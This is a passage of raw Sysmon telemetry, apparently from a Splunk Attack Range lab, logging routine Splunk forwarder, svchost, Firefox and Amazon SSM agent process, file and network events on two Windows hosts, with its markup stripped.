Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EA654CB66412C5C7172E85F62618E95,SHA256=616D979F39CEB7DFD69BC64669BB60015AD07FA90D8DB555E513450576B08470,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:50.171{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDD392684129A2C524845A6005E0F86D,SHA256=B96F632114DA2BAA0D12598E3EB4720FF72AC9906456DB9466221A93D5B0A08E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:50.014{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=568D70C46274A96AAC57CE3B54A58CB9,SHA256=E69A5674F8DE6DE00990A64DB50812EDDB4782D40F563C86E699348C1153CA68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:51.286{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CB38FDC7964D26BE5BAFB7D922D23C4,SHA256=5D6E6FCF57F92AD018F6E6E864B02E53B2D84D650E941E38D930065DED3AF48A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A37-6216-6205-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A37-6216-6205-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A37-6216-6205-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.296{4F8D34B0-1A37-6216-6205-000000003902}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:51.186{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CF622FE919CB189A4F954004B78A7D5,SHA256=23FD3450DE84E6A4EAC13D8E695380962E6079F74A1C9832A525F51B47877F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:52.317{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FEA31194ACA7BACBF4780294699503F,SHA256=B1CFFFBA7B7BC574D07EA1B13FF6C1C1CB33BF8C2C1DFD02EE70BC14C3F167C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:52.514{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5A7C10B85015F464A605FC5ED379F00,SHA256=8D639993C25948C8E19E9D3498C3BF3A1DC841B59D5CA2FF993229D9DC41BD9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:50.534{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51778-false10.0.1.12-8000- 23542300x8000000000000000223341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:52.202{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9891F9E62A46459D322193F9E87F75B7,SHA256=004A91887734A06679AF5738C0E0585B049B3438D2B4768E9482AA8F1C28A587,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:53.486{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=63FE0A8494CAE84E35C31E95EC4A064C,SHA256=013EA5F149479B0293864B8D48E83E1A035D1135392CF674BE442F2EE73CEA99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:53.338{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF02DFA79E41FE2284EC91CEDB41BDA4,SHA256=2C870ACF3676D4A62765EF8C220E7E397806871712E2B99A937093489569E1F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:53.242{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-170MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:53.225{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D9D9B525D3C07C8F9F8E9992A75BD24,SHA256=7E5BA874FB1DF783A3F70984844ABD0182BDEE9B8BEA5D191731BD5138652A40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:51.364{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49617-false169.254.169.254-80http 354300x8000000000000000299438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:51.362{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49616-false169.254.169.254-80http 23542300x8000000000000000299443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:54.354{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6D49F98863BF7975D7FB0BF33D0687A,SHA256=5746DC12B501AF2BA79EC3C253CA9F0AD2DD7B359BD56B588C8D412A71E686BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:54.234{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F23E53D11FD864528D201D54D218C9D3,SHA256=DE47C3051033B7EF5BE577FFA3E9A52DC37284E9AB96377C03B605FA9F44B6F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:52.477{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49618-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:54.227{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-171MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:55.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6E6A573AB5491809367C36DAE10F3C5,SHA256=82673255661B8952D53F2BD4ED4ACA1542104DD5A6097B5578D5DD69D031AB3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:55.261{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B52BCC26030CEE02E563A905445811B4,SHA256=76C60AF04C954B616777CBB98D9F5A4967FCE7514FA794843B0B05E3E5E5C329,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:56.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC5E86AA3F03DD5095B893B81CD15E60,SHA256=06E89D621932116B68785C92C2F9778B7A0D93F2DB73CABEA8B90A0A3321E9F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:56.276{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B5D14541D37EEE71F24EF2B41C7ACD0,SHA256=59B238EE0FDD0A9E38F9C2327A7A38F968F113227872C241AE3C00B001D94B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:57.511{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4678C8DC0F90FAD2DD3A4616827F2A45,SHA256=5D9D3FA12C10C274F5486F138ED8F0357B84971F36797A4A1341FDDD40BE3D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:57.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27E5FBF909CA295FA07B4ED9E59CE039,SHA256=BECEAA684C76C87C015854475D9D4F94AC1F81DB1A32D5F65D018BEDFA9A519B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:56.546{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51779-false10.0.1.12-8000- 23542300x8000000000000000223351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:58.589{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 